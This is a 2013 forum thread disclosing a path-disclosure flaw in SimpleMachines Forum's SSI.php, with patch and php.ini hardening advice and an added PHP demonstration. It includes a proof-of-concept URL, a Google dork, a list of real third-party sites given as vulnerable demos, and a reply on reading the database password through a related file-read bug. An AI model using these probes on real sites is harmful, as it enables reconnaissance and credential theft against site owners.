Full Disclosure in SimpleMachines Forum <= 2.0.3

Started by yan.uniko.102, January 07, 2013, 08:08:28 AM


yan.uniko.102

Summary:
--------------
A security flaw allows an attacker to know the full path of the web system.

Details:
-----------
SSI.php line 294:

// Fetch a post with a particular ID. By default will only show if you have
// permission to see the board in question - this can be overridden.
function ssi_fetchPosts($post_ids, $override_permissions = false, $output_method = 'echo')
{

$post_id is not defined. Possible fix: ($post_id = '')


PoC:
-------
http://example.com/forumpath/SSI.php?ssi_function=fetchPosts

Google Dorks:
---------------------
inurl:?index.php?action=help

Demos:
-----------
http://simpleportal.net/SSI.php?ssi_function=fetchPosts
http://www.furgovw.org/SSI.php?ssi_function=fetchPosts
http://www.teachmideast.com/forum_old/SSI.php?ssi_function=fetchPosts
http://www.slowracing.com/jaxfox/SSI.php?ssi_function=fetchPosts
http://www.iptv2you.com/board/SSI.php?ssi_function=fetchPosts
http://voceteopr.com/SSI.php?ssi_function=fetchPosts
http://www.thesilverball.com/SSI.php?ssi_function=fetchPosts
http://othforums.com/SSI.php?ssi_function=fetchPosts
http://www.skinmod.eu/SSI.php?ssi_function=fetchPosts


Temporary Solution:
---------------------

SSI.php line 45:
$ssi_error_reporting = error_reporting(defined('E_STRICT') ? E_ALL | E_STRICT : E_ALL);

Replace with:
$ssi_error_reporting = error_reporting(0);


Functions affected:
-----------------------

. fetchMember
. fetchPosts
. fetchGroupMembers
. queryMembers

Source:
--------
http://whk.drawcoders.net/index.php/topic,2792.0.html

Mirrors:
-------------------------
http://seclists.org/fulldisclosure/2013/Jan/14
http://packetstormsecurity.com/files/119240/smf-disclose.txt
http://cxsecurity.com/issue/WLB-2013010025
https://foro.elhacker.net/nivel_web/path_disclusore_en_simplemachines_forum_203-t379876.0.html

Arantor

It's not just fetchPosts that will cause this, actually. fetchMember, fetchGroupMembers, queryMembers are all vulnerable to this same bug.

If it wasn't for the fact that voting via SSI requires the query-via-HTTP function, I'd suggest disabling that entirely.

vbgamer45

Confirmed the second one allows reading any file. It seems to only return the first part of the file; there seems to be a limit on how much data it will take from the file, 20 lines, but you can read other parts of the file using the line number if passed.
Community Suite for SMF - Take your forum to the next level, built for SMF: Gallery, Store, Classifieds, Downloads, more!

SMFHacks.com - Paid Modifications for SMF

Mods:
EzPortal - Portal System for SMF
SMF Gallery Pro
SMF Store, SMF Classifieds, Ad Seller Pro

yan.uniko.102

Yes...

http://test.con/forum/index.php?action=...&line=37

to read the MySQL password of SimpleMachines.

Nolt

Hello,

I just checked and it is strange: on one server I couldn't read paths, but on another server where I have a few SMF boards they were affected by this.
Could it be that this hack depends on the server configuration? (php.ini, my.ini, etc.)

Arantor

Think you'll find a lot of this depends on having admin rights.

Not that there isn't an issue - because there is - but since it's not just open to everyone and everything, it's not the issue it might be.

HauntIT

Quote from: Nolt on January 10, 2013, 05:05:50 PM
Hello,

I just checked and it is strange: on one server I couldn't read paths, but on another server where I have a few SMF boards they were affected by this.
Could it be that this hack depends on the server configuration? (php.ini, my.ini, etc.)

Hi SMF Forum ;)

This is my first post here, anyway:
Nolt: yes, this can depend on php.ini settings. Check whether you have enabled parameters like register_globals, display_errors, html_errors, etc., and disable them. Then your errors should not be presented anymore. (For debugging you can set +w on some file on your server and send your logs there, but be careful here too, because somewhere in your web app code there could be an LFI bug, and then you will be owned. ;) )

Best regards,
Jakub
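The SSI.php dispatch pattern from the advisory above and the php.ini settings HauntIT mentions, as an added example that is not SMF code and not from anyone in this thread. The script name, the `harden` switch, the log location and the `ssi_fetchPosts_fixed` copy are assumptions of mine; the dispatcher is a simplified stand-in for SSI.php, not its real code. Run from the command line, the first form prints PHP's own missing-argument diagnostic, which carries the absolute path of the script; the second form keeps the same diagnostic but writes it to a log instead of the response:

```php
<?php
// Added example (not SMF code): minimal stand-in for the SSI.php dispatch where the
// request names an ssi_* function and nothing supplies its arguments.
//
// Usage:  php ssi_demo.php fetchPosts          # leaks the absolute path of this file
//         php ssi_demo.php fetchPosts harden   # nothing shown; diagnostic goes to the log
//         php ssi_demo.php fetchPosts_fixed    # default argument: no diagnostic at all
// Assumed: the script name, the 'harden' switch and the log path are mine.

$harden = isset($argv[2]) && $argv[2] === 'harden';

if ($harden) {
    // Keep reporting so problems are still recorded, but stop sending them to the client.
    // This is what the advisory's error_reporting(0) achieves, without discarding the
    // diagnostics: display_errors is the setting that leaks, not error_reporting.
    error_reporting(E_ALL);
    ini_set('display_errors', '0');
    ini_set('html_errors', '0');
    ini_set('log_errors', '1');
    ini_set('error_log', sys_get_temp_dir() . '/ssi_demo_errors.log'); // assumed location
} else {
    // The exposed configuration: diagnostics rendered into the response.
    error_reporting(E_ALL);
    ini_set('display_errors', '1');
}

// Stand-in for the affected functions (fetchMember, fetchPosts, fetchGroupMembers,
// queryMembers): the first parameter has no default, so a bare call is an error.
// PHP 5 emits E_WARNING "Missing argument 1 for ssi_fetchPosts(), called in <file> on
// line N and defined in <file> on line M"; PHP 7.1+ throws ArgumentCountError. Both
// messages contain the absolute path of this file.
function ssi_fetchPosts($post_ids, $override_permissions = false, $output_method = 'echo')
{
    return is_array($post_ids) ? count($post_ids) : 0;
}

// The advisory's suggested code-level fix, applied to a separate copy: a default value
// turns the bare call into a normal call, so no diagnostic is produced in the first place.
function ssi_fetchPosts_fixed($post_ids = array(), $override_permissions = false, $output_method = 'echo')
{
    return is_array($post_ids) ? count($post_ids) : 0;
}

$name = isset($argv[1]) ? $argv[1] : '';
if ($name !== '' && function_exists('ssi_' . $name)) {
    // SSI.php-style dispatch: the caller chooses the function, nothing supplies $post_ids.
    call_user_func('ssi_' . $name);
}
```

Two points worth checking on a real install: `error_reporting(0)` (the temporary fix above) silences the message but also stops it being logged, whereas `display_errors=Off` with `log_errors=On` keeps the record without exposing it; and on PHP 7.1 and later the bare call is a fatal `ArgumentCountError` rather than a warning, so the SSI request aborts, but the path is still printed whenever `display_errors` is on.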

emanuele



Take a peek at what I'm doing! ;D

Need support in Italian?

Help us help you: explain your problem clearly: no, "it doesn't work" is not an explanation!!
1) What you do,
2) what you expect,
3) what you get.
